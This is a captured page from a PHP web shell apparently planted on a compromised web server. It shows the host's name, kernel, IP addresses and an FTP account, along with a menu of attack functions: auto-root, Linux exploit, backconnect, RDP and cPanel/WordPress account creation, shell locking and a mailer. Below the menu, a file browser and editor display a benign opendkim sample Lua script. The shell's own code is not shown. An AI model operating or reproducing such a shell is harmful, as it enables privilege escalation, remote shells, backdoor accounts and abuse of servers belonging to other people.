Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
opendkim /
[ HOME SHELL ]
Name
Size
Permission
Action
FEATURES
4.02
KB
-rw-r--r--
KNOWNBUGS
1.01
KB
-rw-r--r--
README
33.17
KB
-rw-r--r--
README.fedora
3.73
KB
-rw-r--r--
RELEASE_NOTES
78.8
KB
-rw-r--r--
RELEASE_NOTES.Sendmail
58.96
KB
-rw-r--r--
authheaders-check-setup-hook.l...
2.45
KB
-rw-r--r--
convert_keylist.sh
1.99
KB
-rw-r--r--
final.lua.sample
2.04
KB
-rw-r--r--
opendkim.conf.sample
21.49
KB
-rw-r--r--
opendkim.conf.simple
714
B
-rw-r--r--
opendkim.conf.simple-verify
435
B
-rw-r--r--
screen.lua.sample
984
B
-rw-r--r--
setup.lua.sample
2.17
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : final.lua.sample
-- -- Copyright (c) 2009, 2010, 2012, The Trusted Domain Project. -- All rights reserved. -- -- final.lua.sample -- sample version of the "final" script that demonstrates -- all of the features of the configuration file -- -- The final script is executed after the entire message body has been -- received and processed but before the filter renders its final verdict. -- The main use of this script is to determine whether or not the message -- is acceptable to the verifier, and what final filtering action should be -- taken. For exmaple, if the message failed Author Domain Signing -- Practises tests, or had additional data appended to it beyond what the -- signature covered, or even if the signature simply failed to verify, -- this script can detect such things and take whatever action is desired. -- Retrieve signature count nsigs = odkim.get_sigcount(ctx) if nsigs == nil then return nil end -- Enact ADSP. -- 1) If it reported NXDOMAIN, reject. if odkim.get_presult(ctx) == DKIM_PRESULT_NXDOMAIN then odkim.set_reply(ctx, "554", "5.7.1", "sender domain does not exist") odkim.set_result(ctx, SMFIS_REJECT) return nil end -- 2) Test for discardable. We'll handle "unknown" and "all" through RFC5451. if odkim.get_presult(ctx) == DKIM_PRESULT_FOUND and odkim.get_policy(ctx) == DKIM_POLICY_DISCARDABLE then discard = true for n = 1, nsigs sig = odkim.get_sighandle(ctx, n) sigres = odkim.sig_result(sig) sdomain = odkim.sig_getdomain(sig) if sigres == 0 and sdomain == fromdomain then discard = false end end if discard then odkim.set_result(ctx, SMFIS_REJECT) return nil end end -- If the message had too much stuff added to it (more than 120 bytes) -- then bounce it for n = 1, nsigs do sig = odkim.get_sighandle(ctx, n) bodylen = odkim.sig_bodylength(sig) canonlen = odkim.sig_canonlength(sig) if bodylen > canonlen + 120 then odkim.set_reply(ctx, "554", "", "Too much data after DKIM-protected body") odkim.set_result(ctx, SMFIS_REJECT) end end -- That's it! return nil
Close